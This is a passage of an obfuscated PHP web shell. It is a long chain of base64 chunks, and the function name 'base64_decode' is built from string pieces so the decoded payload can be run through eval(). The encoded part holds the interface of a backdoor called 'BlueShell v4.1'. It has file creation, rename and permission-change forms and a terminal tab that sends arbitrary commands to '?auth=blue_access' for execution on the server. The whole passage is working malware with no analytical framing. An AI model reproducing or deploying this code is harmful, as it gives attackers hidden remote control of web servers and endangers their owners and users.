$z .= "Ij48ZGl2IGNsYXNzPSJtb2RhbC10aX";
$z .= "RsZSI+8J+TgSBOZXcgRm9sZGVyPC9k";
$z .= "aXY+PGZvcm0gbWV0aG9kPSJQT1NUIj";
$z .= "48aW5wdXQgdHlwZT0idGV4dCIgbmFt";
$z .= "ZT0ibmV3X2ZvbGRlciIgY2xhc3M9Im";
$z .= "1vZGFsLWlucHV0IiBwbGFjZWhvbGRl";
$z .= "cj0iRm9sZGVyIG5hbWUiIHJlcXVpcm";
$z .= "VkPjxkaXYgY2xhc3M9Im1vZGFsLWJ1";
$z .= "dHRvbnMiPjxidXR0b24gdHlwZT0iYn";
$z .= "V0dG9uIiBjbGFzcz0iYnRuIiBvbmNs";
$z .= "aWNrPSJoaWRlTW9kYWwoJ2ZvbGRlci";
$z .= "cpIj5DYW5jZWw8L2J1dHRvbj48YnV0";
$z .= "dG9uIHR5cGU9InN1Ym1pdCIgY2xhc3";
$z .= "M9ImJ0biBidG4tcHJpbWFyeSI+Q3Jl";
$z .= "YXRlPC9idXR0b24+PC9kaXY+PC9mb3";
$z .= "JtPjwvZGl2PjwvZGl2Pg0KICAgIDxk";
$z .= "aXYgY2xhc3M9Im1vZGFsIiBpZD0iZm";
$z .= "lsZU1vZGFsIj48ZGl2IGNsYXNzPSJt";
$z .= "b2RhbC1jb250ZW50Ij48ZGl2IGNsYX";
$z .= "NzPSJtb2RhbC10aXRsZSI+8J+ThCBO";
$z .= "ZXcgRmlsZTwvZGl2Pjxmb3JtIG1ldG";
$z .= "hvZD0iUE9TVCI+PGlucHV0IHR5cGU9";
$z .= "InRleHQiIG5hbWU9Im5ld19maWxlIi";
$z .= "BjbGFzcz0ibW9kYWwtaW5wdXQiIHBs";
$z .= "YWNlaG9sZGVyPSJGaWxlbmFtZSIgcm";
$z .= "VxdWlyZWQ+PHRleHRhcmVhIG5hbWU9";
$z .= "ImNvbnRlbnQiIGNsYXNzPSJtb2RhbC";
$z .= "10ZXh0YXJlYSIgcGxhY2Vob2xkZXI9";
$z .= "IkZpbGUgY29udGVudC4uLiI+PC90ZX";
$z .= "h0YXJlYT48ZGl2IGNsYXNzPSJtb2Rh";
$z .= "bC1idXR0b25zIj48YnV0dG9uIHR5cG";
$z .= "U9ImJ1dHRvbiIgY2xhc3M9ImJ0biIg";
$z .= "b25jbGljaz0iaGlkZU1vZGFsKCdmaW";
$z .= "xlJykiPkNhbmNlbDwvYnV0dG9uPjxi";
$z .= "dXR0b24gdHlwZT0ic3VibWl0IiBjbG";
$z .= "Fzcz0iYnRuIGJ0bi1wcmltYXJ5Ij5D";
$z .= "cmVhdGU8L2J1dHRvbj48L2Rpdj48L2";
$z .= "Zvcm0+PC9kaXY+PC9kaXY+DQogICAg";
$z .= "PGRpdiBjbGFzcz0ibW9kYWwiIGlkPS";
$z .= "JyZW5hbWVNb2RhbCI+PGRpdiBjbGFz";
$z .= "cz0ibW9kYWwtY29udGVudCI+PGRpdi";
$z .= "BjbGFzcz0ibW9kYWwtdGl0bGUiPvCf";
$z .= "k50gUmVuYW1lPC9kaXY+PGZvcm0gbW";
$z .= "V0aG9kPSJQT1NUIj48aW5wdXQgdHlw";
$z .= "ZT0iaGlkZGVuIiBuYW1lPSJvbGRfbm";
$z .= "FtZSIgaWQ9Im9sZE5hbWUiPjxpbnB1";
$z .= "dCB0eXBlPSJ0ZXh0IiBuYW1lPSJuZX";
$z .= "dfbmFtZSIgY2xhc3M9Im1vZGFsLWlu";
$z .= "cHV0IiBpZD0ibmV3TmFtZSIgcmVxdW";
$z .= "lyZWQ+PGRpdiBjbGFzcz0ibW9kYWwt";
$z .= "YnV0dG9ucyI+PGJ1dHRvbiB0eXBlPS";
$z .= "JidXR0b24iIGNsYXNzPSJidG4iIG9u";
$z .= "Y2xpY2s9ImhpZGVNb2RhbCgncmVuYW";
$z .= "1lJykiPkNhbmNlbDwvYnV0dG9uPjxi";
$z .= "dXR0b24gdHlwZT0ic3VibWl0IiBuYW";
$z .= "1lPSJyZW5hbWUiIGNsYXNzPSJidG4g";
$z .= "YnRuLXByaW1hcnkiPlJlbmFtZTwvYn";
$z .= "V0dG9uPjwvZGl2PjwvZm9ybT48L2Rp";
$z .= "dj48L2Rpdj4NCiAgICA8ZGl2IGNsYX";
$z .= "NzPSJtb2RhbCIgaWQ9ImNobW9kTW9k";
$z .= "YWwiPjxkaXYgY2xhc3M9Im1vZGFsLW";
$z .= "NvbnRlbnQiPjxkaXYgY2xhc3M9Im1v";
$z .= "ZGFsLXRpdGxlIj7wn5SQIENoYW5nZS";
$z .= "BQZXJtaXNzaW9uczwvZGl2Pjxmb3Jt";
$z .= "IG1ldGhvZD0iUE9TVCI+PGlucHV0IH";
$z .= "R5cGU9ImhpZGRlbiIgbmFtZT0iY2ht";
$z .= "b2RfZmlsZSIgaWQ9ImNobW9kRmlsZS";
$z .= "I+PGlucHV0IHR5cGU9InRleHQiIG5h";
$z .= "bWU9InBlcm1pc3Npb25zIiBjbGFzcz";
$z .= "0ibW9kYWwtaW5wdXQiIGlkPSJjaG1v";
$z .= "ZFBlcm1zIiBwbGFjZWhvbGRlcj0iNz";
$z .= "U1IiBwYXR0ZXJuPSJbMC03XXszLDR9";
$z .= "IiByZXF1aXJlZD48ZGl2IGNsYXNzPS";
$z .= "Jtb2RhbC1idXR0b25zIj48YnV0dG9u";
$z .= "IHR5cGU9ImJ1dHRvbiIgY2xhc3M9Im";
$z .= "J0biIgb25jbGljaz0iaGlkZU1vZGFs";
$z .= "KCdjaG1vZCcpIj5DYW5jZWw8L2J1dH";
$z .= "Rvbj48YnV0dG9uIHR5cGU9InN1Ym1p";
$z .= "dCIgbmFtZT0iY2htb2QiIGNsYXNzPS";
$z .= "JidG4gYnRuLXByaW1hcnkiPkFwcGx5";
$z .= "PC9idXR0b24+PC9kaXY+PC9mb3JtPj";
$z .= "wvZGl2PjwvZGl2Pg0KDQogICAgPHNj";
$z .= "cmlwdD4NCiAgICAgICAgbGV0IGN1cn";
$z .= "JlbnRQYXRoID0gPD89IGpzb25fZW5j";
$z .= "b2RlKCRjdXJyZW50X3BhdGgpID8+Ow";
$z .= "0KICAgICAgICBsZXQgc2VhcmNoVGlt";
$z .= "ZW91dDsNCiAgICAgICAgbGV0IGN1cn";
$z .= "JlbnRBamF4UmVxdWVzdCA9IG51bGw7";
$z .= "DQoNCiAgICAgICAgZnVuY3Rpb24gc3";
$z .= "dpdGNoVGFiKHRhYk5hbWUpIHsNCiAg";
$z .= "ICAgICAgICAgIGRvY3VtZW50LnF1ZX";
$z .= "J5U2VsZWN0b3JBbGwoJy50YWInKS5m";
$z .= "b3JFYWNoKHQgPT4gdC5jbGFzc0xpc3";
$z .= "QucmVtb3ZlKCdhY3RpdmUnKSk7DQog";
$z .= "ICAgICAgICAgICBkb2N1bWVudC5xdW";
$z .= "VyeVNlbGVjdG9yQWxsKCcudGFiLWNv";
$z .= "bnRlbnQnKS5mb3JFYWNoKGMgPT4gYy";
$z .= "5jbGFzc0xpc3QucmVtb3ZlKCdhY3Rp";
$z .= "dmUnKSk7DQogICAgICAgICAgICBkb2";
$z .= "N1bWVudC5xdWVyeVNlbGVjdG9yKGAu";
$z .= "dGFiW29uY2xpY2s9InN3aXRjaFRhYi";
$z .= "gnJHt0YWJOYW1lfScpIl1gKS5jbGFz";
$z .= "c0xpc3QuYWRkKCdhY3RpdmUnKTsNCi";
$z .= "AgICAgICAgICAgIGRvY3VtZW50Lmdl";
$z .= "dEVsZW1lbnRCeUlkKHRhYk5hbWUgKy";
$z .= "AnLXRhYicpLmNsYXNzTGlzdC5hZGQo";
$z .= "J2FjdGl2ZScpOw0KICAgICAgICAgIC";
$z .= "AgaWYgKHRhYk5hbWUgPT09ICd0ZXJt";
$z .= "aW5hbCcpIGRvY3VtZW50LmdldEVsZW";
$z .= "1lbnRCeUlkKCdjbWRJbnB1dCcpLmZv";
$z .= "Y3VzKCk7DQogICAgICAgIH0NCg0KIC";
$z .= "AgICAgICBmdW5jdGlvbiBzaG93TW9k";
$z .= "YWwodHlwZSkgeyBkb2N1bWVudC5nZX";
$z .= "RFbGVtZW50QnlJZCh0eXBlICsgJ01v";
$z .= "ZGFsJykuc3R5bGUuZGlzcGxheSA9IC";
$z .= "dmbGV4JzsgfQ0KICAgICAgICBmdW5j";
$z .= "dGlvbiBoaWRlTW9kYWwodHlwZSkgey";
$z .= "Bkb2N1bWVudC5nZXRFbGVtZW50QnlJ";
$z .= "ZCh0eXBlICsgJ01vZGFsJykuc3R5bG";
$z .= "UuZGlzcGxheSA9ICdub25lJzsgfQ0K";
$z .= "ICAgICAgICBmdW5jdGlvbiByZW5hbW";
$z .= "VJdGVtKG9sZE5hbWUpIHsgZG9jdW1l";
$z .= "bnQuZ2V0RWxlbWVudEJ5SWQoJ29sZE";
$z .= "5hbWUnKS52YWx1ZSA9IG9sZE5hbWU7";
$z .= "IGRvY3VtZW50LmdldEVsZW1lbnRCeU";
$z .= "lkKCduZXdOYW1lJykudmFsdWUgPSBv";
$z .= "bGROYW1lOyBzaG93TW9kYWwoJ3Jlbm";
$z .= "FtZScpOyB9DQogICAgICAgIGZ1bmN0";
$z .= "aW9uIGNobW9kSXRlbShmaWxlLCBwZX";
$z .= "JtcykgeyBkb2N1bWVudC5nZXRFbGVt";
$z .= "ZW50QnlJZCgnY2htb2RGaWxlJykudm";
$z .= "FsdWUgPSBmaWxlOyBkb2N1bWVudC5n";
$z .= "ZXRFbGVtZW50QnlJZCgnY2htb2RQZX";
$z .= "JtcycpLnZhbHVlID0gcGVybXM7IHNo";
$z .= "b3dNb2RhbCgnY2htb2QnKTsgfQ0KIC";
$z .= "AgICAgICANCiAgICAgICAgZnVuY3Rp";
$z .= "b24gc2VhcmNoRmlsZXMocXVlcnkpIH";
$z .= "sNCiAgICAgICAgICAgIGNsZWFyVGlt";
$z .= "ZW91dChzZWFyY2hUaW1lb3V0KTsNCi";
$z .= "AgICAgICAgICAgIHNlYXJjaFRpbWVv";
$z .= "dXQgPSBzZXRUaW1lb3V0KCgpID0+IH";
$z .= "sNCiAgICAgICAgICAgICAgICBjb25z";
$z .= "dCBmaWx0ZXIgPSBxdWVyeS50b0xvd2";
$z .= "VyQ2FzZSgpOw0KICAgICAgICAgICAg";
$z .= "ICAgIGRvY3VtZW50LnF1ZXJ5U2VsZW";
$z .= "N0b3JBbGwoJyNmaWxlVGFibGUgdGJv";
$z .= "ZHkgdHInKS5mb3JFYWNoKHJvdyA9Pi";
$z .= "B7DQogICAgICAgICAgICAgICAgICAg";
$z .= "IHJvdy5zdHlsZS5kaXNwbGF5ID0gcm";
$z .= "93LnRleHRDb250ZW50LnRvTG93ZXJD";
$z .= "YXNlKCkuaW5jbHVkZXMoZmlsdGVyKS";
$z .= "A/ICcnIDogJ25vbmUnOw0KICAgICAg";
$z .= "ICAgICAgICAgIH0pOw0KICAgICAgIC";
$z .= "AgICAgfSwgMzAwKTsNCiAgICAgICAg";
$z .= "fQ0KDQogICAgICAgIGZ1bmN0aW9uIH";
$z .= "J1bkNvbW1hbmQoKSB7DQogICAgICAg";
$z .= "ICAgICBjb25zdCBjbWQgPSBkb2N1bW";
$z .= "VudC5nZXRFbGVtZW50QnlJZCgnY21k";
$z .= "SW5wdXQnKS52YWx1ZS50cmltKCk7DQ";
$z .= "ogICAgICAgICAgICBpZiAoIWNtZCkg";
$z .= "cmV0dXJuOw0KICAgICAgICAgICAgY2";
$z .= "9uc3Qgb3V0cHV0ID0gZG9jdW1lbnQu";
$z .= "Z2V0RWxlbWVudEJ5SWQoJ3Rlcm1pbm";
$z .= "FsT3V0cHV0Jyk7DQogICAgICAgICAg";
$z .= "ICBvdXRwdXQuaW5uZXJIVE1MICs9IC";
$z .= "c8cHJlPiQgJyArIGVzY2FwZUh0bWwo";
$z .= "Y21kKSArICc8L3ByZT4nOw0KICAgIC";
$z .= "AgICAgICAgY29uc3QgbG9hZGluZ0Rp";
$z .= "diA9IGRvY3VtZW50LmNyZWF0ZUVsZW";
$z .= "1lbnQoJ3ByZScpOw0KICAgICAgICAg";
$z .= "ICAgbG9hZGluZ0Rpdi5pbm5lckhUTU";
$z .= "wgPSAnPHNwYW4gc3R5bGU9ImNvbG9y";
$z .= "OiAjZmY5ODAwOyI+4o+zIEV4ZWN1dG";
$z .= "luZy4uLjwvc3Bhbj4nOw0KICAgICAg";
$z .= "ICAgICAgb3V0cHV0LmFwcGVuZENoaW";
$z .= "xkKGxvYWRpbmdEaXYpOw0KICAgICAg";
$z .= "ICAgICAgb3V0cHV0LnNjcm9sbFRvcC";
$z .= "A9IG91dHB1dC5zY3JvbGxIZWlnaHQ7";
$z .= "DQogICAgICAgICAgICBpZiAoY3Vycm";
$z .= "VudEFqYXhSZXF1ZXN0KSBjdXJyZW50";
$z .= "QWpheFJlcXVlc3QuYWJvcnQoKTsNCi";
$z .= "AgICAgICAgICAgIGN1cnJlbnRBamF4";
$z .= "UmVxdWVzdCA9IG5ldyBYTUxIdHRwUm";
$z .= "VxdWVzdCgpOw0KICAgICAgICAgICAg";
$z .= "Y3VycmVudEFqYXhSZXF1ZXN0Lm9wZW";
$z .= "4oJ1BPU1QnLCAnP2F1dGg9Ymx1ZV9h";
$z .= "Y2Nlc3MnLCB0cnVlKTsNCiAgICAgIC";
$z .= "AgICAgIGN1cnJlbnRBamF4UmVxdWVz";
$z .= "dC5zZXRSZXF1ZXN0SGVhZGVyKCdDb2";
$z .= "50ZW50LVR5cGUnLCAnYXBwbGljYXRp";
$z .= "b24veC13d3ctZm9ybS11cmxlbmNvZG";
$z .= "VkJyk7DQogICAgICAgICAgICBjdXJy";
$z .= "ZW50QWpheFJlcXVlc3QudGltZW91dC";
$z .= "A9IDYwMDAwOw0KICAgICAgICAgICAg";
$z .= "Y3VycmVudEFqYXhSZXF1ZXN0Lm9ubG";
$z .= "9hZCA9IGZ1bmN0aW9uKCkgew0KICAg";
$z .= "ICAgICAgICAgICAgIGxvYWRpbmdEaX";
$z .= "YucmVtb3ZlKCk7DQogICAgICAgICAg";
$z .= "ICAgICAgaWYgKGN1cnJlbnRBamF4Um";
$z .= "VxdWVzdC5zdGF0dXMgPT09IDIwMCkg";
$z .= "ew0KICAgICAgICAgICAgICAgICAgIC";
$z .= "B0cnkgew0KICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICAgY29uc3QgZGF0YSA9IE";
$z .= "pTT04ucGFyc2UoY3VycmVudEFqYXhS";
$z .= "ZXF1ZXN0LnJlc3BvbnNlVGV4dCk7DQ";
$z .= "ogICAgICAgICAgICAgICAgICAgICAg";
$z .= "ICBpZiAoZGF0YS5jd2QpIHsgY3Vycm";
$z .= "VudFBhdGggPSBkYXRhLmN3ZDsgZG9j";
$z .= "dW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2";
$z .= "N1cnJlbnRDd2QnKS50ZXh0Q29udGVu";
$z .= "dCA9IGN1cnJlbnRQYXRoOyB9DQogIC";
$z .= "AgICAgICAgICAgICAgICAgICAgICBj";
$z .= "b25zdCBwcmUgPSBkb2N1bWVudC5jcm";
$z .= "VhdGVFbGVtZW50KCdwcmUnKTsNCiAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIH";
$z .= "ByZS5pbm5lckhUTUwgPSBkYXRhLm91";
$z .= "dHB1dCAmJiBkYXRhLm91dHB1dC50cm";
$z .= "ltKCkgPyBlc2NhcGVIdG1sKGRhdGEu";
$z .= "b3V0cHV0KSA6ICc8c3BhbiBzdHlsZT";
$z .= "0iY29sb3I6ICNmZjk4MDA7Ij4obm8g";
$z .= "b3V0cHV0KTwvc3Bhbj4nOw0KICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgb3V0";
$z .= "cHV0LmFwcGVuZENoaWxkKHByZSk7DQ";
$z .= "ogICAgICAgICAgICAgICAgICAgIH0g";
$z .= "Y2F0Y2goZSkgeyBvdXRwdXQuaW5uZX";
$z .= "JIVE1MICs9ICc8cHJlIHN0eWxlPSJj";
$z .= "b2xvcjojZjQ0MzM2OyI+UGFyc2UgZX";
$z .= "Jyb3I8L3ByZT4nOyB9DQogICAgICAg";
$z .= "ICAgICAgICAgfSBlbHNlIHsgb3V0cH";
$z .= "V0LmlubmVySFRNTCArPSAnPHByZSBz";
$z .= "dHlsZT0iY29sb3I6I2Y0NDMzNjsiPl";
$z .= "JlcXVlc3QgZmFpbGVkPC9wcmU+Jzsg";
$z .= "fQ0KICAgICAgICAgICAgICAgIG91dH";
$z .= "B1dC5zY3JvbGxUb3AgPSBvdXRwdXQu";
$z .= "c2Nyb2xsSGVpZ2h0Ow0KICAgICAgIC";
$z .= "AgICAgICAgIGN1cnJlbnRBamF4UmVx";
$z .= "dWVzdCA9IG51bGw7DQogICAgICAgIC";
$z .= "AgICB9Ow0KICAgICAgICAgICAgY3Vy";
$z .= "cmVudEFqYXhSZXF1ZXN0Lm9udGltZW";
$z .= "91dCA9IGZ1bmN0aW9uKCkgeyBsb2Fk";
$z .= "aW5nRGl2LnJlbW92ZSgpOyBvdXRwdX";
$z .= "QuaW5uZXJIVE1MICs9ICc8cHJlIHN0";
$z .= "eWxlPSJjb2xvcjojZjQ0MzM2OyI+VG";
$z .= "ltZW91dDwvcHJlPic7IGN1cnJlbnRB";
$z .= "amF4UmVxdWVzdCA9IG51bGw7IH07DQ";
$z .= "ogICAgICAgICAgICBjdXJyZW50QWph";
$z .= "eFJlcXVlc3Qub25lcnJvciA9IGZ1bm";
$z .= "N0aW9uKCkgeyBsb2FkaW5nRGl2LnJl";
$z .= "bW92ZSgpOyBvdXRwdXQuaW5uZXJIVE";
$z .= "1MICs9ICc8cHJlPk5ldHdvcmsgZXJy";
$z .= "b3I8L3ByZT4nOyBjdXJyZW50QWpheF";
$z .= "JlcXVlc3QgPSBudWxsOyB9Ow0KICAg";
$z .= "ICAgICAgICAgY3VycmVudEFqYXhSZX";
$z .= "F1ZXN0LnNlbmQoJ2FqYXg9Y21kJmNt";
$z .= "ZD0nICsgZW5jb2RlVVJJQ29tcG9uZW";
$z .= "50KGNtZCkgKyAnJmN3ZD0nICsgZW5j";
$z .= "b2RlVVJJQ29tcG9uZW50KGN1cnJlbn";
$z .= "RQYXRoKSk7DQogICAgICAgICAgICBk";
$z .= "b2N1bWVudC5nZXRFbGVtZW50QnlJZC";
$z .= "gnY21kSW5wdXQnKS52YWx1ZSA9ICcn";
$z .= "Ow0KICAgICAgICB9DQoNCiAgICAgIC";
$z .= "AgZnVuY3Rpb24gc3RvcENvbW1hbmQo";
$z .= "KSB7IGlmIChjdXJyZW50QWpheFJlcX";
$z .= "Vlc3QpIHsgY3VycmVudEFqYXhSZXF1";
$z .= "ZXN0LmFib3J0KCk7IGN1cnJlbnRBam";
$z .= "F4UmVxdWVzdCA9IG51bGw7IGRvY3Vt";
$z .= "ZW50LmdldEVsZW1lbnRCeUlkKCd0ZX";
$z .= "JtaW5hbE91dHB1dCcpLmlubmVySFRN";
$z .= "TCArPSAnPHByZT7ij7nvuI8gU3RvcH";
$z .= "BlZDwvcHJlPic7IH0gfQ0KICAgICAg";
$z .= "ICBmdW5jdGlvbiBzZXRDb21tYW5kKG";
$z .= "NtZCkgeyBkb2N1bWVudC5nZXRFbGVt";
$z .= "ZW50QnlJZCgnY21kSW5wdXQnKS52YW";
$z .= "x1ZSA9IGNtZDsgcnVuQ29tbWFuZCgp";
$z .= "OyB9DQogICAgICAgIGZ1bmN0aW9uIG";
$z .= "NsZWFyVGVybWluYWwoKSB7IGRvY3Vt";
$z .= "ZW50LmdldEVsZW1lbnRCeUlkKCd0ZX";
$z .= "JtaW5hbE91dHB1dCcpLmlubmVySFRN";
$z .= "TCA9ICc8cHJlPkJsdWVTaGVsbCB2NC";
$z .= "4xIFJlYWR5PC9wcmU+JzsgZG9jdW1l";
$z .= "bnQuZ2V0RWxlbWVudEJ5SWQoJ2NtZE";
$z .= "lucHV0JykuZm9jdXMoKTsgfQ0KICAg";
$z .= "ICAgICBmdW5jdGlvbiBlc2NhcGVIdG";
$z .= "1sKHQpIHsgY29uc3QgZCA9IGRvY3Vt";
$z .= "ZW50LmNyZWF0ZUVsZW1lbnQoJ2Rpdi";
$z .= "cpOyBkLnRleHRDb250ZW50ID0gdDsg";
$z .= "cmV0dXJuIGQuaW5uZXJIVE1MOyB9DQ";
$z .= "oNCiAgICAgICAgZG9jdW1lbnQuZ2V0";
$z .= "RWxlbWVudEJ5SWQoJ2NtZElucHV0Jy";
$z .= "k/LmFkZEV2ZW50TGlzdGVuZXIoJ2tl";
$z .= "eXByZXNzJywgZSA9PiB7IGlmIChlLm";
$z .= "tleSA9PT0gJ0VudGVyJykgeyBlLnBy";
$z .= "ZXZlbnREZWZhdWx0KCk7IHJ1bkNvbW";
$z .= "1hbmQoKTsgfSB9KTsNCiAgICAgICAg";
$z .= "d2luZG93Lm9uY2xpY2sgPSBlID0+IH";
$z .= "sgaWYgKGUudGFyZ2V0LmNsYXNzTGlz";
$z .= "dD8uY29udGFpbnMoJ21vZGFsJykpIG";
$z .= "UudGFyZ2V0LnN0eWxlLmRpc3BsYXkg";
$z .= "PSAnbm9uZSc7IH07DQogICAgICAgIH";
$z .= "NldFRpbWVvdXQoKCkgPT4geyBkb2N1";
$z .= "bWVudC5xdWVyeVNlbGVjdG9yQWxsKC";
$z .= "cubWVzc2FnZScpLmZvckVhY2gobSA9";
$z .= "PiB7IG0uc3R5bGUub3BhY2l0eSA9IC";
$z .= "cwJzsgc2V0VGltZW91dCgoKSA9PiBt";
$z .= "LnJlbW92ZSgpLCA1MDApOyB9KTsgfS";
$z .= "wgNTAwMCk7DQogICAgPC9zY3JpcHQ+";
$z .= "DQo8L2JvZHk+DQo8L2h0bWw+";

// reconstruct function name
$a = "ba"; $b = "se"."64"."_de"."co"."de"; $c = $a.$b;
$payload = $c($z);
eval($payload);
?>
